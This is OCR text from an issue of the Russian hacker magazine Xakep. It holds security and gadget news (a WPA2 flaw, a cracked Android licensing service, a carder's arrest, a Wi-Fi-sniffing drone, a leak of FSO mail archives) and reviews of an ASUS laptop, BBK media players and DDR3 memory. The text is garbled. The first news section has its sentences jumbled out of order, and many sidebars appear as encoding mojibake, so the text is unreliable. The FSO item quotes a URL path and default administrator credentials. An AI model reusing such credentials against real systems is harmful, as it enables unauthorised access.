так что предположение. В высшей степени безопасный. заряжаться девайс способен прямо во время работы через mirco-USB). рублей. Зато команда сайта Engadget попыталась подтвердить или опровергнуть приведенные DownloadSquad «факты». использующим технологию Logitech Advanced 2. XÀÊÅÐ 10 /141/ 10 . пока неясно: Google и Verizon ситуацию никак не комментируют. и храниться информация должна не менее 50 лет. то поиски могут совсем затянуться. что клавиатура сможет проработать без подзарядки до 10 дней (кстати. что они же займутся планшетом. ни много ни мало. com. ведь нашим спецслужбам принципиально важно. что планшет якобы будет выпущен 012 совместно с телекоммуникационной компанией Verizon и в продажу поступит уже 26 ноября текущего года! На DownloadSquad даже описали железо. Напомним. что именно HTC делала для «Гугла» Nexus One. Требования к носителям просты и до боли кое-что напоминают: на диск должно умещаться не менее 25 Гб данных.MEGANEWS ÔÑÁ ÍÓÆÅÍ ÑÂÎÉ BLU-RAY Похоже. чтобы диски не читались ни одним из существующих сегодня устройств. толщина — не более 1. а скорость физического уничтожения информации составляла не более 60 секунд. ÑËÓÕÈ Î CHROME OS TABLET По Сети расползаются слухи о скором появлении планшетного ПК на базе Chrome OS. Но пользоваться Blu-Ray ФСБ не желает категорически. Õóæå âñåãî ñåáÿ ïðîÿâèëè Kingsoft è Bkis BKAV. по информации некоего закрытого источника. на котором была опубликована запись. «принципиально отличающегося от традиционных стандартов CD. эргономичных клавиш Incurve Keys плавный и тихий.4 GHz — она практически исключает лаги и отключения. что выбрать клавиатуру с подсветкой — это настоящая проблема. это практически Blu-Ray. Устройство уже можно искать в магазинах. Диаметр будущих дисков составит 120 мм. К тому же инженеры Logitech обещают. ÑÂÅÒ ÂÎ ÒÜÌÅ ÎÒ LOGITECH Любители посидеть за компьютером в темное время суток хорошо знают. Скорость записи — от 26 Мб/с. Узнаешь? Да. что продажа Chrome OS планшетов начнется никак не раньше 2011 года. Беспроводной девайс оснащен сенсором движения (стоит убрать руки от клавиатуры — «веселые огоньки» погаснут) и датчиком освещенности. а уж если тебе нужен беспроводной вариант.». что позволяет ему автоматически регулировать яркость подсветки и экономить заряд аккумуляторов. и потратить на это собираются.2 мм. Начало пересудам положил ресурс downloadsquad. Известно. так сказать. DVD. 45 млн. число информационных слоев — до четырех. которые не любят печатать вслепую. Но парни с DownloadSquad не ограничились одним лишь именем производителя — еще они сообщили. Достойных моделей на рынке единицы. компания HTC уже вовсю занимается разработкой Chrome OS Tablet. которым предположительно будет укомплектована новинка. Он утверждает. — вполне логично. кроме сроков и имени производителя. что. что за 27 месяцев планируется создать опытную партию из 200 дисков. Клавиатура комплектуется крошечным приемником Logitech Unifying. обратившись к собственному источнику. скорость чтения — от 36 Мб/с. но очень быстро выяснилось. благодаря которой ход изогнутых. Blu-ray и др. Logitech Wireless Illuminated Keyboard K800 от компании Logitech должна порадовать полуночников. Федеральная служба безопасности России решила. íå ñóìåâ ïîëó÷èòü ñåðòèôèêàò VB100. построить свой Луна-парк. рекомендованная цена составляет 100 евро. 19 èç 54 àíòèâèðóñíûõ ïðîäóêòîâ ïðîâàëèëè òåñò ëàáîðàòîðèè Virus Bulletin. Также подразумевается разработка устройства для чтениязаписи таких носителей и технологии их изготовления. рассказывающая. Еще одна приятная особенность новинки — система PerfectStroke. Не окажется ли ложной и эта информация. Одно из технических подразделений ФСБ — войсковая часть 68240 — объявило конкурс на создание оптического носителя. что это были лишь домыслы автора текста — источник не называл сайту ничего конкретного.

íåïîâòîðèìûì Êðèñîì Êàñïåðñêè. а также различные неприятные вещи вроде подмены MAC-адресов. Меньше месяца потребовалось хакеру по имени Джастин Кейс (Justin Case) на взлом новой системы Android Licensing Service. что Google исправит свою оплошность. а вот GTK — нет. с 200 Мб памяти и резистивным TFT-экраном с диагональю 3. вероятно. либо прекращает функционировать через заданное число дней (зависит от выбора разработчика). что возможны и другие варианты атак. çà $7. и Group Temporal Key (GTK). призванной защитить Android-приложения от нелегального распространения. то ее. а тут нас таким старьем пичкают». для защиты личного трафика. что проблема ключей GTK описана на 196 странице стандарта IEEE 802. Никакого «подвоха» здесь нет. И это лишь верхушка айсберга — исследователи подчеркивают. Подвержены уязвимости. 2007). совместимые со стандартом IEEE802. Кстати. команда все равно намерена обнародовать эксплойт. тем не менее.androidpolice. авторизованный в Wi-Fi-сети. Êðóïíîå ñëèÿíèå íà çàïàäíîì ðûíêå: êîìïàíèÿ Intel ïðèîáðåëà êîìïàíèþ McAfee âìåñòå ñî âñåìè åå øåñòüþ òûñÿ÷àìè ñîòðóäíèêîâ è îäíèì. просто Android-девайсы понемногу дешевеют :). можно будет обновить с помощью прошивки. За эти деньги ты получишь полноценный коммуникатор на базе процессора Qualcomm MSM7227 с частотой 600 МГц.com в надежде. дабы с ним смогли ознакомиться все желающие. Ознакомиться с подробностями можно по адресу: www. Джастин же написал небольшой патч. приложение либо сразу становится неработоспособным. взялось не с потолка — дело в том. помогающий отличить одну сеть от другой и предназначенный для шифрования бродкаст-трафика. получившей имя Hope 196. Для любителей снимать все вокруг имеется встроенная камера: 3 Мп с автофокусом. Но. Использовать брешь можно при помощи атаки типа Man-in-themiddle — пользователь.ANDROID-ÑÌÀÐÒÔÎÍ ÎÒ LG ÇÀÙÈÒÀ ANDROID ÏÐÎÄÅÐÆÀËÀÑÜ ÍÅ ÄÎËÃÎ Компания LG выпустила в продажу новый смартфон с Android 1. Как выяснилось. который заставляет систему поверить. название Hole 196. Что касается версии Android’а на борту. воспользовавшись эксплойтом.6 на борту — LG Optimus (GT540).11! Да-да.990 рублей.airtightnetworks.0 версия Android’а выйдет.1+EDR (A2DP). поддержкой геотэггинга и функцией распознавания лица.  WPA2 ÎÁÍÀÐÓÆÈËÈ «ÄÛÐÊÓ» Команда независимых исследователей.0” (320x480). она была там все последние годы. поддержка до 32 Гб). обитающая под крылом компании AirTight Networks. может перехватывать данные. Bluetooth 2. что все установленные на смартфоне приложения легальны. Wi-Fi. Суть в следующем: WPA2-протокол использует два типа ключей: Pairwise Transient Key (PTK). Кто-то возможно заметит: «Во дают! Уже вот-вот 3. Но тут вопрос в цене устройства: она составляет всего 8.com/wpa2-hole196 XÀÊÅÐ 10 /141/ 10 013 .68 ìëðä. PTK способны обнаруживать спуфинг адресов и перехват данных.11 (Revision. а регулирующие органы получили возможность внести в WPA2 поправки. Если система обнаруживает что-то подозрительное. все сети. нашла уязвимость в столпе защиты Wi-Fi-сетей — протоколе шифрования данных WPA2. Принцип работы Licensing Service прост — смартфон через определенные промежутки времени связывается с сервером Google и проверяет. FM-радио и имеет слот microSD (2 Гб в комплекте. Девайс оснащен microUSB. передаваемые другими юзерами этой сети. все ли установленные на нем приложения легальны. уникальный для каждого клиента. Подробный результат своих исследований и принцип работы патча хакер опубликовал на сайте www.

составляет почти 7 метров. ÷òî. Вот у чуваков. облетит нужные места. но BadB так и не оставил свой «бизнес» — он держал в инете пару сайтов с предложениями о продаже. BadB имел самое прямое отношение к почившей CC и торговал секретными данными о кредитных картах и банковских счетах. Как известно.com (CC приказал долго жить еще в 2004 году). 014 XÀÊÅÐ 10 /141/ 10 . был бы «нужный» склад ума. Аппараты планируется использовать для автоматических полетов по заданным маршрутам и фотосъемки. время полного заряда аккумулятора — 4-4. Один из агентов Секретной службы США сыграл роль покупателя и приобрел у кардера данные о паре ворованных кредиток. В воздухе WASP (Wi-Fi Aerial Surveillance Platform) может находиться 30-45 минут. на которую он способен подняться. Система поддерживает связь наземной станции с базовой в режиме реального времени. когда Владислава арестовали. ему также предъявили обвинения в мошенничестве и махинациях с банковскими данными и в краже с отягчающими обстоятельствами. Кстати. Устройство должно поступить в продажу до конца года. ËÅÃÊÈÌ ÄÂÈÆÅÍÈÅÌ ÐÓÊÈ IPAD ÑÒÀÍÎÂÈÒÑß ÍÅÒÁÓÊÎÌ Очень любопытный аксессуар для iPad разработала компания Shenzhen Paoluy Silicone Technology. и при непрерывной работе — до 90 часов.5 часа. создавших сайт www. Беспилотник оснащается так же Edge/3G модемом. посредством PPP over SSH тоннеля.Drone. По их информации. 1 Гб RAM с Backtrack 4 на борту) и наладили систему автоматического пилотирования ArduPilot. Теперь. который управляется при помощи iPhone. Зарядить «папочку» можно при помощи стандартного кабеля Apple с док-коннектором. способный облетать территорию по заданному маршруту и при этом собирать информацию о Wi-Fi-сетях! За основу была взята модель МиГ-23. но благодаря беспроводной (Bluetooth) QWERTY-клавиатуре превратит iPad в полноценный ноутбук. Google недавно закупил подобные беспилотники у компании Microdrones. Так французская полиция задержала в аэропорту Ниццы 27-летнего Владислава Хорохорина — выходца из России. Но главная фишка. Эти парни собрали беспилотный аппарат. Кардеру заочно были вынесены обвинения в финансовых махинациях с использованием устройств доступа. конечно. что дрону можно задать GPS-координаты.rabbit-hole. По первой статье Хорохоркину грозит тюремное заключение сроком до 10 лет и штраф в размере 250 тысяч долларов. ÎÁËÅÒ WI-FI-ÑÅÒÅÉ ÍÀ ÁÐÅÞÙÅÌ ÏÎËÅÒÅ Не успели мы рассказать тебе о классном квадрокоптере Parrot AR. из любой точки планеты. а к сумме штрафа — еще 250 тысяч американских дензнаков. а также в воровстве при отягчающих обстоятельствах с использованием чужих персональных данных. оставлял объявления на хакерских ресурсах и так далее. Футляр BL-BKB76. выполненный в виде папки. заключается в том. и максимальная высота. гражданина Израиля и Украины.org. в корыстных целях можно использовать практически все. В итоге вычислили Владислава через Сеть. по ориентировочной цене $90.MEGANEWS ÝÕÎ CARDERPLANET Уже много лет прошло с момента закрытия легендарного кардерского сайта carderplanet. Время работы клавиатуры от одного заряда в режиме ожидания составит около 100 дней. активно искали спецслужбы США. автоматически. и он сам. «просканирует эфир» и соберет информацию. Заинтригован? Тогда спешим порадовать — по указанному выше адресу ты найдешь кучу подробностей и отличную подборку ссылок по теме «как мне построить такой же аппарат?». 49% àìåðèêàíöåâ è 52% âåëèêîáðèòàíöåâ íå ïðî÷ü ïðèõâàòèòü ñ ñîáîé êîíôèäåíöèàëüíûå ôàéëû êîìïàíèè. а вторая статья добавляет к сроку заключения еще 2 года. Для быстрого подключения клавиатуры к планшету даже предусмотрен специальный хоткей. к которой добавили комп Via Epia Pico ITX PC (500 МГц Via C7. но членов бывшей «семьи» полиция и спецслужбы разных стран мира ловят до сих пор. как появилась новость о другом интересном дроне. «Планета» давно закрылась. Полученные данные должны пригодиться в Google Earth и Google Maps. Да. Последние пару лет Хорохоркина. не только защитит «яблочный» планшетник от царапин и потертостей. Роль наземной станции выполняет комп с программой ArduStation. что позволяет управлять процессом удаленно. которая обсчитывает всю телеметрическую информацию. Èññëåäîâàíèå Harris Interactive âûÿâèëî. склад ума явно подходящий :). óâîëüíÿÿñü ñ ðàáîòû. известного в Сети как BadB.

и выглядела она так: «https://[ip]/cgi-bin/main. утверждал. которой воспользовались анонимусы.ru. ФСО.  ïåðâóþ î÷åðåäü âëèâàíèå îðèåíòèðîâàíî íà äàëüíåéøåå ðàçâèòèå áèçíåñ-ìîäåëè freemium. в свою очередь. конечно. правда.ÏÎ×ÒÓ ÔÑÎ ÐÎÑÑÈÈ «ÂÑÊÐÛËÈ» Писать о каждом взломе.scm. что никакой важной информации и тем более секретных данных в Сеть не утекло (ничего такого по указанному адресу просто не было). что по ссылке находится архив электронной почты системы оперативно-розыскных мероприятий (СОРМ) — программно-технического комплекса. что анонимусам удалось получить доступ к системе мониторинга и архивирования корпоративной почты «Дозор». но умолчать об одном недавнем хаке никак нельзя. официально заявила. однако некоторые источники уверяют. Разумеется. XÀÊÅÐ 10 /141/ 10 015 . нашли дырку. что об уязвимости. Анонимус. а «всего лишь» внутренняя переписка ФСО. обмену SMS и электронными сообщениями. Говоря проще. дефейсе и утечке информации мы. расположенной на сервере rsnet. ведущую в архивы электронной почты Федеральной службы охраны России. adm:admin». Áîðöû ñ ìàëâàðåì èç êîìïàíèè Avast ïîëó÷èëè $100 ìëí. по линку располагался не архив СОРМ. разработчики знали с зимы текущего года. Однако факт остается фактом — на протяжении нескольких часов любой юзер мог зайти и почитать почтовые архивы Федеральной службы охраны. позволяющего получать доступ к телефонным переговорам граждан. не можем — слишком уж много таких вещей происходит в сети ежечасно. Разработавшая «Дозор» компания «Инфосистемы Джет» от комментариев отказывается. èíâåñòèöèé îò ôèðìû Summit Partners. В конце августа по анонимным имейджбордам со скоростью лесного пожара распространилась информация о том.

Корпус выглядит стильно и дорого. компания ASUS создала целую линейку ноутбуков Bamboo. в оформлении корпусов которых пластик заменен бамбуковыми панелями: экологичным и возобновляемым материалом. которые прослужат не меньше. что бамбук как материал вообще является лучшей заменой пластику: он обладает прочностью на растяжение. чем обычный пластиковый корпус. Ноут отлично подойдет XÀÊÅÐ 10 /141/ 10 . который. а бамбук очень приятен на ощупь: теплый и слегка шеро- 016 ховатый материал. Размеры ноутбука таковы. что у тебя не возникнет проблем при любом его использовании: 14” – универсальный сайз.FERRUM Íîóòáóê-áàìáóê Îáçîð íîóòáóêà ASUS U43Jc Проявляя заботу об окружающей среде. ÝÊÑÒÅÐÜÅÐ При осмотре ноутбука первым делом в глаза бросается необычный корпус: бамбуковые панели и алюминий! Из видимых частей только клавиатурные клавиши сделаны из пластика. близкой к некоторым маркам стали! Так что вопрос о прочности и надежности можно исключить. однородных и прочных панелей. Не должен смущать вопрос о его надежности: ASUS использовала современные технологии обработки бамбука для производства легких. очень стильно и необычно выглядит. Разработчики ASUS утверждают. С одним из представителей обновленной линейки бамбуковых ноутов — ASUS U43Jc — мы и познакомимся сегодня. к тому же.

18 см. Trend Club — дискуссионный клуб для тех.intel.14 Кг •Оптический привод DVD Super Multi с поддержкой двухслойных дисков ÀÊÑÅÑÑÓÀÐÛ ÄËß ÍÎÓÒÁÓÊÀ • Êàáåëü ASUS Crosslink создан для быстрого перемещения файлов между компьютерами. вещь незаменимая: не даст ноуту промокнуть под дождем и защитит от механических повреждений. расшарить сетевое соединение либо переместить большой объем данных между двумя компами.1 x 2. самая тонкая модель U33Jc поставляется без него. Корпорация Intel. дисков и мобильного телефона.ru/rating. 017 .MS. Забавной особенностью наушников является система силовой обратной связи. Набирать текст можно в любом режиме и практически при любых условиях. продлить срок службы батарей и увеличить время автономной работы: в зависимости от конфигурации. когда высокая мощность не требуется.intel. Наличие в ноутбуке второй интегрированнной видеокарты позволяет задействовать одну из самых приятных фишек — технологию NVIDIA Optimus. продукцию и инициативы. 2xUSB 2. RJ45. ты это почувствуешь собственной головой :). в том числе — один USB 3. пространство между которыми занято декоративной решеткой.66 ГГц •Чипсет: Mobile Intel® HM55 Express Chipset •Память: 4 Гб DDR3 1066 МГц SDRAM •Дисплей: 14". распределяя ее оптимальным образом между процессами. а также на сайте http://blogs.MMC. 2. либо берешь его в путешествия. кто интересуется прогрессом и задумывается о будущем. разведен на одной из панелей и HDMI-выход. которая контролирует загруженность системы и интеллектуально регулирует производительность. 5400 об/мин •Интерфейсы: 5-в-1 кардридер (SD. так и для развлечений: яркого LED-дисплея с разрешением 1366x768 вполне достаточно. и снижать ее до минимума в те моменты. Ноутбук оснащен мощным графическим контроллером NVIDIA GeForce 310M с 1 Гб видеопамяти DDR3 VRAM. С его помощью можно в мгновение ока решить проблему отсутствующего DVD-привода в нетбуке. HDMI •Размеры и вес: 34. производительный лэптоп с универсальной диагональю 14”.5 часов по тестам ASUS. которая вместе с эффективной технологией контроля производительности обеспечивает значительное время автономной работы: до 10. • ASUS VECTOR BACKPACK — удобный рюкзак для твоего ноутбука. Trend Club поддерживается компаниями Intel® и ASUS и проводит регулярные конкурсы с ценными призами.ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ •Процессор: Intel® Core™ i7-620M с частотой 2. 1Гб DDR3 VRAM •Жесткий диск: 640Гб. По своим параметрам и свойствам. Отдельной похвалы заслуживает и емкая батарея. синхронизации данных и организации совместного доступа к интернет-подключению либо оптическому накопителю. Если ты часто таскаешь лэптоп на работу/ учебу. а необходимый софт (для Windows или MAC) размещен на встроенной в кабель флешке объемом 4 Гб. что ноутбуки этой серии доступны и на процессорах Intel® Core™ i5 со встроенной графикой GMA HD. а также присутствуют три разъема USB.6”). Mic. глянцевый. Headphone. ключей. Плюс в этом рюкзаке полно различных кармашков для мелочей и места для бумаг. когда необходима максимальная производительность . Клавиатура лишена миниатюрных или неудобных кнопок – все расположено максимально удобно и за это стоит сказать инженерам ASUS отдельное спасибо. Для получения дополнительной информации о рейтинге процессоров Intel посетите сайт www. ÍÀ×ÈÍÊÀ Что касается начинки — тут у ASUS U43Jc полный порядок: наш лэптоп оснащен мощным четырехъядерным процессором Intel® Core™ i7-620M с XÀÊÅÐ 10 /141/ 10 частотой 2. Отлично подходит для ноутов с диагональю до 16 дюймов. если в CS Source рядом с тобой взорвется граната. и никаких претензий не возникло. Естественно. заставляя наушники вибрироватьв соответствии с тем. Он придется по вкусу подвижным людям. ведущий мировой производитель инновационных полупроводниковых компонентов.ru. футурологию и другие темы завтрашнего дня.0.5 часов! ÂÛÂÎÄÛ Помимо U43Jc в линейку ASUS Bamboo Series входят еще два ноутбука: U33Jc (диагональ 13. ASUS U43Jc способен жить без розетки до 10. которые часто берут ноутбук с собой на работу или в дорогу.0. Необычный дизайн и используемые материалы никого не оставят равнодушными и гарантированно вызовут интерес окружающих. поддерживается мультитач.MS-Pro. а с помощью трех — симулировать работу правой кнопки мыши. так что традиционно можно с помощью двух пальцев перелистывать изображения или ресайзить объекты.0.3”) и U53Jc (15. что делает их отличным выбором для игр и просмотра фильмов. Он отлично подойдет для самого широкого спектра задач: это современный.XD). Стоит вспомнить и о технологии ASUS Super Hybrid Engine (SHE). 1366x768. intel. 16:9. Грубо говоря. В целом все работает классно. USB 3. •USB-íàóøíèêè ASUS CineVibe способны воспроизводить глубокие басы и чистые средние и высокие частоты. Ноутбуки довольно схожи и кроме диагонали матрицы различаются оптическим приводом: младшая. Участники Trend Club обсуждают технические новинки. разрабатывает технологии. как для работы. Дополнительную информацию о корпорации Intel можно найти на Web-сервере компании Intel http://www. Сайт производителя указывает. позволяющей повышать частоту процессора до 3. Раскладка клавиатуры выполнена великолепно — аккуратные клавиши низкой посадки.ru.com.66 ГГц и поддержкой технологии Intel® Turbo Boost. Физически все функционирует через интерфейс USB. по цвету и материалу он не отличается от остального корпуса – бамбук и тут.20~3. Само собой. чтобы смотреть HD-видео и играть в игры. которая усиливает эффект от глубоких басов.направленные на постоянное повышение качества жизни людей и совершенствование методов их работы. которая сама переключает видеокарты в зависимости от потребностей приложений. VGA/Mini D-sub.4 x 24. Подробнее о ноутбуках ASUS и других гаджетах вы можете узнать в новом дискуссионном сообществе на trendclub. информационные технологии. LED-подсветка •Видеоадаптер: NVIDIA® GeForce® 310M. ASUS U43Jc — настоящий универсал.33 ГГц в моменты. Это позволяет улучшить производительность. то он выделяется на общем фоне только за счет небольших канавок на его границе. что происходит на экране. Что касается тачпада. что весьма благоприятно сказывается на балансе производительности и времени работы батареи.

JPEG HD. к тому же. JPEG.FERRUM Медиаплееры BBK Что делать. И пусть фраза про «минимальный функционал» тебя не пугает . предназначенных для доставки мультимедийного контента из Сети прямиком на экран твоего ТВ.3. а ищет удобства и простоты в работе и настройке. MP4 Аудио . конечно. Технические характеристики Сеть: Нет Разъемы: HDMI 1. MPA). WAV. справедливости ради стоит сказать. USB 2. M4A. MPG). но не на мониторе компьютера. 018 MP050S Младшая модель серии придется по вкусу тем. чем на мониторе. придется раскошелиться на медиаплеер. будь то флешка. 2890 р. Стереофонический аудиовыход. Смотреть на этот страх можно исключительно и только в умеренных дозах. MPEG-1/2 PS (M2P. внешний USB-винт (поддерживаются FAT. и вот увидишь.если тебе не нужны головная боль и путаница проводов. Конечно. IFO Максимальное разрешение: 1080p HDD в комплекте: Нет Пульт ДУ: Есть Габариты: 121x26x101 XÀÊÅÐ 10 /141/ 10 . MP050S можно рекомендовать владельцам телевизоров. которые потом. будут пылиться на полке годами. мы познакомим тебя с линейкой отличных HD-медиаплееров от компании BBK. PNG Другое . VOB. в том числе MKV (Matroska) и MOV (H.проигрывать мультимедийный контент он может только с внешних накопителей. несчастный возопит: «Мои глаза! Как я жил раньше?!» и. если смотреть кино и любимые сериалы хочется в хорошем качестве. Но. лучше обрати внимание на модели приведенные ниже. в виду чего нам пр иходится «наслаждаться» картинкой с соотношением сторон 4:3 и посредственным качеством. WMA Изображения . а уж о контенте российских телеканалов мы вообще лучше умолчим. MPEG audio (MP1. Так что если ты ищешь решение.и BD-рипами на любой вкус. MPEG-2. с комфортом развалившись на диване? Ответ прост . кто не собирается оборудовать дома навороченный медиацентр. MOV (H. Композитный видеовыход. Ничего удивительно тут нет . а на большой диагонали телевизора. если говорить об эфирном телевидении .ISO. чем покупать не самые дешевые диски. Вот последним-то и обусловлена быстро растущая популярность различных мультимедийных проигрывателей. MP050S поддерживает практически любые современные форматы файлов. MKV (Matroska). посмотреть его и стереть.0. сделает выбор в пользу HD.несмотря на доступную цену. увы и ах.большой экран Сегодня в технических характеристиках почти любого телевизора можно найти строки «поддержка HDTV» и «Full HD». Как ты мог заметить. проще и быстрее. Однако. ASF. и тем. которая уже который год производит «всеядные» и доступные устройства на радость синефилам.дай любому человеку сравнить картинку в HD и SD. FAT32 и NTFS) или карта памяти. WMV. которое можно будет «подружить» с домашним файловым хранилищем или компом. в голову просто не может не закрасться мысль.MPEG-1/2/4. Разрешения высокой четкости 1280х720 и 1920х1080 наконец-то перестали быть экзотикой для эстетов и становятся вполне будничной штукой. AVI. Учитывая эту печальную ситуацию и тот факт. MP050S не «сетевой» девайс . согласись . MP2.264). BMP.Россия пока находится в процессе перехода на цифровой формат телевещания. Чтобы помочь тебе сориентироваться в этом изобилии. не имеющих USB-портов. Универсальный считыватель карт памяти SD/MMC/MS Поддерживаемые форматы: Видео . ни о каком HDTV речи нет.AAC. Цифровой коаксиальный аудиовыход. что на телевизионном экране большие разрешения будут выглядеть куда более впечатляюще. что торренты и файлообменники завалены HDTV. Большим разрешениям . это куда дешевле.264). что помимо «цифры» существуют еще и Blu-ray диски.скачать фильм. На рынке сейчас представлено множество девайсов. кто ищет компактности и минимального функционала без лишней переплаты.

WMA Изображения . 4690 р. eSATA Host Поддерживаемые форматы: Видео .для этого на борту плеера предусмотрено место под внутренний жесткий диск SATA 3.MPEG-1/2/4. Эта модель не только поможет тебе вывести на телеэкран красоты в HDTV качестве. Компонентный видеовыход. BMP. MKV (Matroska). M4A. VOB. поможет тебе своевременно отследить последние кино-новинки в Сети и скачать их. Благодаря менеджеру закачек. MPEG-2. IFO Максимальное разрешение: 1080p HDD в комплекте: Нет Пульт ДУ: Есть Габариты: 134x195x125 Сеть: LAN (Ethernet) 10/100 Мбит/с Разъемы: HDMI 1. AAC. MiniUSB. С учетом того. Цифровой оптический аудиовыход. Цифровой оптический аудиовыход. Можно также напрямую подсоединить к плееру SATA-диск (ограничения по объему нет). тем более что в таком случае производитель обещает пятикратное ускорение при чтении и записи HD-контента. JPEG. WMA.5 ТБ и наслаждайся. WAV.ISO. MPEG audio (MP1. или напрямую к Сети. MKV (Matroska).MPEG-1/2/4.MP060S MP070S Медиапроигрыватель MP060S предлагает более серьезный функционал и способен претендовать на звание «полезнейшего девайса для киномана». особенностью девайса является то. а хочешь. но и с готовностью возьмет на себя труд по выкачиванию из Сети новых киноманских радостей . MP070S без запинки «прожует» практически любые форматы и кодеки.264). MPEG-2. MP2. JPEG. образовав небольшой «перевалочный пункт».264). MOV (H. компу.3. MPEG-1/2 PS (M2P. уже не технической. MOV (H. 3600 р. DTS.AAC. Универсальный считыватель карт памяти SD/MMC/MS. AVI. Цифровой коаксиальный аудиовыход. Но главная «фишка» девайса в том. M4A. WMV. BMP. WMA Изображения . Старшая модель линейки обладает всеми необходимыми характеристиками. равно как и его собрат MP060S модели. WMV. Настройка и подключение устройства к роутеру. PNG Другое . AVI. MPG). которыми должно обладать сердце современного домашнего медиацентра. PNG Другое . Технические характеристики: Технические характеристики: Сеть: LAN (Ethernet) 10/100 Мбит/с Разъемы: HDMI 1.JPEG HD.5".0. Универсальный считыватель карт памяти SD/MMC/MS. ASF.0 х 2. MPA). MP1. SATA Host Поддерживаемые форматы: Видео . что помимо умения общаться с любыми внешними накопителями. MPEG audio (MP1. MP060S очень «фэн-шуйно» впишется в их ряды. предельно просты и не займут много времени. MiniUSB. поставь туда скромный накопитель на 6080 ГБ. AAC. MPA).5” жесткого диска SATA) Пульт ДУ: Есть Габариты: 210x51x162 XÀÊÅÐ 10 /141/ 10 019 . Композитный видеовыход. VOB. что подавляющее большинство нынешних внешних «винтов» стоят на своих подставках вертикально. MP4 Аудио . USB 2.плеер оснащен встроенным менеджером закачек (BitTorrent и HTTP). он и сам может выступать в роли хранилища файлов . Стереофонический аудиовыход. MPEG-1/2 PS (M2P. Цифровой коаксиальный аудиовыход. WAV.JPEG HD. MP2. MP4 Аудио . MP070S. ASF.3. WMA Pro. Еще одной приятной. так и в вертикальном положении. Композитный видеовыход. что расположить его можно как в горизонтальном. IFO Максимальное разрешение: 1080p HDD в комплекте: Нет (есть отсек для установки внутреннего 3.ISO. Стереофонический аудиовыход. Хочешь. Компонентный видеовыход. LPCM.AC3 (Dolby Digital). MP2. USB 2. установи внутрь 1. MPG).

мегагерцами и ценой. которые сами по себе дадут минимальный прирост производительности. из которого мы запустили набор тестов памяти. так как на ней соглашались работать далеко не все модули. то есть объемом. Делая из вышесказанного вывод. Приступая к тесту. служит еще и маркером стабильности. использующийся для хранения красивейших (и объемнейших) текстур и прочих прелестей. мы решили попробовать преодолеть планку в 1800 МГц с помощью разгона по частоте шины. ÷àñòîòó è òàê äàëåå. что. также максимально нагрузил ОЗУ и выдал результат в баллах.65 В). таймингами. встроенный в архиватор WinRAR. нужно отметить. да еще и в одноканальном режиме. есть некоторые особенности. которая. записи. Толку от такого взвешенного решения будет гораздо больше. Говоря об экономической составляющей приобретения памяти и помня о том. òàê êàê âñåìè åãî ïðåèìóùåñòâàìè ìû âîñïîëüçîâàòüñÿ âñå ðàâíî íå ñìîæåì. ÒÅÕÍÎËÎÃÈÈ ÌÅÒÎÄÈÊÀ ÒÅÑÒÈÐÎÂÀÍÈß Как мы уже упоминали выше. что у нас есть только два канала. лучше найти правильное соотношение между всеми параметрами. а. которые накладывают определенные ограничения на выбор памяти. Athlon II X4 635 ÂÈÄÅÎÊÀÐÒÀ: MSI Radeon HD 4850 ÁËÎÊ ÏÈÒÀÍÈß. а такая вещь. Также был запущен и тест. в большинстве современных игр важны не мегагерцы и тайминги памяти. как уже упомянутый ранее объем ОЗУ. Íàøå ñåãîäíÿøíåå òåñòèðîâàíèå ïîñâÿùåíî ÎÇÓ äëÿ ïëàòôîðìû AMD. îáúåì. которую можно получить. у процессоров AMD. àáû êàêàÿ ïàìÿòü íàì íå íóæíà. а с другой — позволили выявить реальные показатели каждого комплекта. Для достижения больших значений придется заниматься оверклокингом FSB. Кроме того. так как при переразгоне и вызванной им нестабильности мгновенно завершит тест. Ïðîáëåìà æå çàêëþ÷àåòñÿ â òîì. мы логично взяли на тестирование не просто отдельные планки памяти. что приобретать топовое решение. у всех участников были одинаковые тайминги (9-9-9-24) и напряжение (1. FSP Blue Storm ÎÏÅÐÀÖÈÎÍÍÀß ÑÈÑÒÅÌÀ: Windows 7 32-bit Ïàìÿòêà äëÿ AMD ÒÅÑÒ ÏÀÌßÒÈ DDR3 Àêñèîìà ïðî òî. êîòîðàÿ èìååò ñâîè îñîáåííîñòè. Íàø îáçîð êàê ðàç ïîìîæåò òåáå íàéòè îïòèìàëüíîå ðåøåíèå. из которого были взяты цифры чтения. как ты понимаешь. увеличивая делитель — 1800 МГц. èçâåñòíà âñåì óæå äàâíî. Everest. Однако на практике даже с частотой 2000 МГц нам поработать не удалось. К ним относятся поддержка только двух каналов ОЗУ. а также максимальная частота памяти. ÷òîáû ïðàâèëüíî ïîäîáðàòü ýòó ñàìóþ ïàìÿòü — åå ìàðêó. ÌÃÖ: 2700. ÂÒ: 700. и у соответствующей платформы. следовательно. íî è áðàòü ñàìîå äîðîãîå ïðåäëîæåíèå ðûíêà òàêæå íå ñòîèò. ÷òî îïåðàòèâíîé ïàìÿòè ìíîãî íå áûâàåò. нам не очень интересно. Бенчмарк PCMark Vantage. К счастью. кроме выдачи результата. Кроме того. 020 XÀÊÅÐ 10 /141/ 10 . состоящие из двух модулей — это и удобно. В итоге мы приняли соломоново решение — тестировать каждый комплект на максимально стабильной частоте. Для собственно тестирования мы использовали программу SuperPI с точностью до миллиона знаков. на что пойдет далеко не каждый пользователь. видимо.FERRUM Сергей Никитин ÒÅÑÒÎÂÛÉ ÑÒÅÍÄ ÑÈÑÒÅÌÍÀß ÏËÀÒÀ: ASUS Crosshair IV Formula ÏÐÎÖÅÑÑÎÐ. и выгодно. особо смысла нет. а наборы. Ñëåäîâàòåëüíî. копирования и латентности. поэтому с одной стороны испытания сохранили объективность. они не очень отличались.

2700 ðóá.

5700 ðóá.

APACER GIANT II
DK 02GAL F9QK2
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 1024
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 1800
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 9-9-9-27
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 1,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

Новичкам всегда везет, как говорится. Вот и компания Apacer, не так
уж и давно вышедшая на рынок оперативной памяти, предоставила
нам на тест такой комплект, который сразу завоевал награду «Лучшая
покупка». И совсем не просто так. В активе у этой памяти самая высокая
частота работы (1980 МГц), до которой, надо отдать должное, и близко не
подобрался никто из конкурентов, а также самая низкая латентность.
